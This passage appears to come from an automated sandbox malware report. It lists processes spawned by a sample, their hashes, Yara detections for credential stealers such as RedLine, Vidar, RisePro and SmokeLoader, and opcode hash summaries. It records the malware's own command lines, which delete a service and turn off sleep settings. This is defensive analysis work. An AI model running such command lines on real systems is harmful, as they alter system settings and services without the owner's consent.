Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe
Imagebase:	0x140000000
File size:	11'214'848 bytes
MD5 hash:	B091C4848287BE6601D720997394D453
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
Imagebase:	0xdb0000
File size:	5'655'872 bytes
MD5 hash:	A7615F3FAF64E8C2DC8412FC30D5AE17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000002.2622383626.0000000004770000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000003.2393333451.0000000004877000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe
Imagebase:	0x9c0000
File size:	1'963'008 bytes
MD5 hash:	46C4BF1B012F8B2E5B8F45F4F6FD97F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000003.1948566084.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.2098966112.00000000009C1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe
Imagebase:	0x420000
File size:	206'848 bytes
MD5 hash:	53B44E832F052CF336E7D356905F0AB2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe
Imagebase:	0x400000
File size:	293'888 bytes
MD5 hash:	917E3841636183444EC8970D46F1A89A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.2162059804.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2163166547.0000000000B9D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe
Imagebase:	0xac0000
File size:	5'726'528 bytes
MD5 hash:	66373AA110A885E380BBA4FFABC8157F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:15:14
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe
Imagebase:	0x400000
File size:	7'828'164 bytes
MD5 hash:	2A9FA9F2EFF4AEA3FFBD2407751B7A51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:15:15
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:15:15
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:15:15
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:15:18
Start date:	28/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:15:18
Start date:	28/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.2195916450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2255116493.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:15:18
Start date:	28/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x9d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.2334904925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.2381027828.0000000000F17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:15:19
Start date:	28/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001B.00000002.2895958085.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	09:15:19
Start date:	28/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	09:15:20
Start date:	28/03/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	09:15:20
Start date:	28/03/2024
Path:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp" /SL5="$50440,1578341,54272,C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe"
Imagebase:	0x400000
File size:	693'760 bytes
MD5 hash:	1468F751DD82E8A2B603DE47E40EA363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	09:15:22
Start date:	28/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624
Imagebase:	0xff0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:15:22
Start date:	28/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632
Imagebase:	0xff0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:15:22
Start date:	28/03/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6b1010000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:15:22
Start date:	28/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7616 -ip 7616
Imagebase:	0xff0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:15:22
Start date:	28/03/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'706'248 bytes
MD5 hash:	2CD533891AF666A2EC525BFE8B3E4E7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6b1010000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff6b1010000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff6b1010000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:15:23
Start date:	28/03/2024
Path:	C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe
Imagebase:	0x520000
File size:	5'099'600 bytes
MD5 hash:	9EFA9907423CC7A421C7008BD8A0BF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.2173995104.0000000005890000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.2045291964.0000000003C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.2038976319.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.2045291964.0000000003C38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:15:25
Start date:	28/03/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "OBGPQMHF"
Imagebase:	0x7ff6d4e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	09:15:25
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:15:25
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	09:15:26
Start date:	28/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 980
Imagebase:	0xff0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF64935CE67 Relevance: 5.5, Strings: 2, Instructions: 2992COMMON

Download Yara Rule

Strings

9s, xrefs: 00007FF64938D76E
s=m, xrefs: 00007FF64938EAEE

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID: 9s$s=m
API String ID: 0-4041374873
Opcode ID: 89c79dbe002d4adf6d856e6aa7fea573fcf4d9912071ad7b7d7de8ff0504c106
Instruction ID: 7ed4a0a95013504380da1ce1f1395eed50508f4b8f112d4b125dac14f2daf8e8
Opcode Fuzzy Hash: 89c79dbe002d4adf6d856e6aa7fea573fcf4d9912071ad7b7d7de8ff0504c106
Instruction Fuzzy Hash: B5F271229B9D0D07F76C5FB8EC4ABA27182F350321F99837EC919D36C6DC6D588681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CE99 Relevance: 2.5, Strings: 1, Instructions: 1286COMMON

Download Yara Rule

Strings

5, xrefs: 00007FF6493A73CF

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 501f8fc5670c5476801845dd7af4cc6d9da96c466a642e08f28f575c9e1ffff5
Instruction ID: 70c8de090785f30f6de830e2d5e298d568e2c14ade0dda1ed64385f5b8038cd4
Opcode Fuzzy Hash: 501f8fc5670c5476801845dd7af4cc6d9da96c466a642e08f28f575c9e1ffff5
Instruction Fuzzy Hash: 46628361DB9E0E07F76C5BB9EC8ABF17182F391320F98837DC959822D7DC5D058A8186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935F5D5 Relevance: 2.2, Instructions: 2160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e2f9808dc07c753eff9f80063470e041111b1cf86bd5fec7660c4fb0ccce3e1
Instruction ID: e8f97e8ceaca7898cfe6719e624d5809683fec2b49a95fff93ca45c9cc90ddc0
Opcode Fuzzy Hash: 3e2f9808dc07c753eff9f80063470e041111b1cf86bd5fec7660c4fb0ccce3e1
Instruction Fuzzy Hash: 72B27322AB9D0E07F76C9BB9EC5ABE17183F390321F99837EC519C26D6DC6D448640C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CEFD Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

!CZS, xrefs: 00007FF6493D3DA2

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID: !CZS
API String ID: 0-4179661134
Opcode ID: 89542b7b2e573c46360ad7aea1b3d112fe1643da060c65b63c571e8edaf3c6ea
Instruction ID: 3cae95208c48d8b5960769f04ce62d517bd631b62604678b6e0b199560ef6733
Opcode Fuzzy Hash: 89542b7b2e573c46360ad7aea1b3d112fe1643da060c65b63c571e8edaf3c6ea
Instruction Fuzzy Hash: EEE18222AB5D0E07F36C5FE9EC4ABE27182F350311F99827E890DD36D6DC6C588691C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D15A Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

x.], xrefs: 00007FF6495014BB

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID: x.]
API String ID: 0-753773205
Opcode ID: 8f85f9b2eaf071568d2b5b4a6b59967ec6257a66470faed1fa599fd4496f23b3
Instruction ID: 2befb76e134ed78e358900f137ecd34a7a64864bfa571cd746c601f2b5531fe4
Opcode Fuzzy Hash: 8f85f9b2eaf071568d2b5b4a6b59967ec6257a66470faed1fa599fd4496f23b3
Instruction Fuzzy Hash: D3C190329B8D1D07F36C5BA8EC4ABE171C2F354321F99827E990DD32D6DCAD588681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64936823E Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86fef79577876add276335445742ca2e2e729f2fb4dedbee5740e6d970d06cd
Instruction ID: 10fb388429a9de3189a9a32720d9a93e2160f7406a740450c0625498da1c5584
Opcode Fuzzy Hash: d86fef79577876add276335445742ca2e2e729f2fb4dedbee5740e6d970d06cd
Instruction Fuzzy Hash: AB225F22EB5E1E06F3685BF8EC8ABE17181F351324F9A437A8D5DD35D6DC6C088681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF649368468 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019eab84bd726d60c85d1ab1151a7c1c457e353e051210d7a3fd61f2ffe85e7a
Instruction ID: 6cf6e16afa74c0ae3e08f3015343090c090409bf390deea91eff66840567288e
Opcode Fuzzy Hash: 019eab84bd726d60c85d1ab1151a7c1c457e353e051210d7a3fd61f2ffe85e7a
Instruction Fuzzy Hash: 0B028522DB5E1E07F3685BF8E88ABE1B181F351325F9A437A8D4DD35D5DC6C088681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D0E5 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e937811588e925c5ce9dc5565ad62b4e333f3aab4e77e607ac811db3647604a
Instruction ID: 6dd007cf1b4722286aca36127976dbc166adf9a499e8ae7f83cc94898e9a55a5
Opcode Fuzzy Hash: 1e937811588e925c5ce9dc5565ad62b4e333f3aab4e77e607ac811db3647604a
Instruction Fuzzy Hash: CDF19532AB9D1D07F76C9FA9EC5ABE17182F740320F99427E984DC32C6DD6C588681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CDA9 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d5f8e6537cd443ed6bd6dafc612dacdff262128f131524a2eaa9ef2ce60b33
Instruction ID: 4978f97cdb5ce0e0c4ef6f3303fe0e59a3d959e74da2b5833d16d68ce7e43d19
Opcode Fuzzy Hash: 44d5f8e6537cd443ed6bd6dafc612dacdff262128f131524a2eaa9ef2ce60b33
Instruction Fuzzy Hash: C5E16222AB9D0D07F35C5FB9EC4ABA17182F394321F99827ED81DC32D7DD6C5486818A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CF07 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
